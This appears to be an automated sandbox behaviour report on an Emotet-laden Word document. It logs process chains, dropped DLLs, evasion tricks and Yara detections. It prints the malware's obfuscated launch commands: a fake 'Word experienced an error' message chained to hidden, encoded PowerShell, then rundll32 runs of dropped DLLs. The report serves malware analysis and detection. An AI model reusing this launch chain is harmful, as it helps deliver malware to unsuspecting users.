Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$stand-8881014518 00944.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCE75.tmp
Source: bestand-8881014518 00944.doc OLE indicator, Word Document stream: true
Source: bestand-8881014518 00944.doc OLE document summary: title field not present or empty
Source: bestand-8881014518 00944.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: bestand-8881014518 00944.doc Virustotal: Detection: 31%
Source: bestand-8881014518 00944.doc ReversingLabs: Detection: 47%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: powershell.exe, 00000005.00000002.2102033680.0000000003A65000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2100547515.000000001000D000.00000002.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096325794.0000000002967000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2095912827.0000000002780000.00000002.00000001.sdmp
Source: bestand-8881014518 00944.doc Initial sample: OLE summary subject = withdrawal Sports, Toys & Health budgetary management architectures Borders synthesize SSL Usability synergize e-commerce

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: bestand-8881014518 00944.doc Stream path 'Macros/VBA/Oi5oelv0_s4' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Oi5oelv0_s4 Name: Oi5oelv0_s4
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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 Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FF002822CC pushad ; retf 5_2_000007FF00282381
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FF00282350 pushad ; retf 5_2_000007FF00282381
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10008085 push ecx; ret 7_2_10008098
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004ADA push ecx; ret 7_2_10004AED

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2516 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.2092815275.0000000000274000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rundll32.exe, 00000007.00000002.2095781612.00000000006BD000.00000004.00000020.sdmp Binary or memory string: PPTP00VMware_S
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt, 7_2_100011C0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 7_2_1000C620
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026C4FF mov eax, dword ptr fs:[00000030h] 7_2_0026C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024C4FF mov eax, dword ptr fs:[00000030h] 8_2_0024C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AC4FF mov eax, dword ptr fs:[00000030h] 9_2_003AC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021C4FF mov eax, dword ptr fs:[00000030h] 10_2_0021C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0040C4FF mov eax, dword ptr fs:[00000030h] 11_2_0040C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AC4FF mov eax, dword ptr fs:[00000030h] 12_2_002AC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002AC4FF mov eax, dword ptr fs:[00000030h] 13_2_002AC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026C4FF mov eax, dword ptr fs:[00000030h] 14_2_0026C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_020AC4FF mov eax, dword ptr fs:[00000030h] 15_2_020AC4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0023C4FF mov eax, dword ptr fs:[00000030h] 16_2_0023C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0021C4FF mov eax, dword ptr fs:[00000030h] 17_2_0021C4FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_003DC4FF mov eax, dword ptr fs:[00000030h] 18_2_003DC4FF
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 7_2_10001B30
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_10007F07

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [base64-encoded PowerShell command line omitted]
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004C5A cpuid 7_2_10004C5A
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter, 7_2_10007D46
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000009.00000002.2098442031.00000000003A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2346389267.00000000003D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2095140776.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2108654595.00000000020A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2099597236.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2095230919.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2107302523.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2096491142.0000000000241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2104856163.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2346371672.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2101735840.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2101060119.0000000000401000.00000020.00000001.sdmp, type: MEMORY
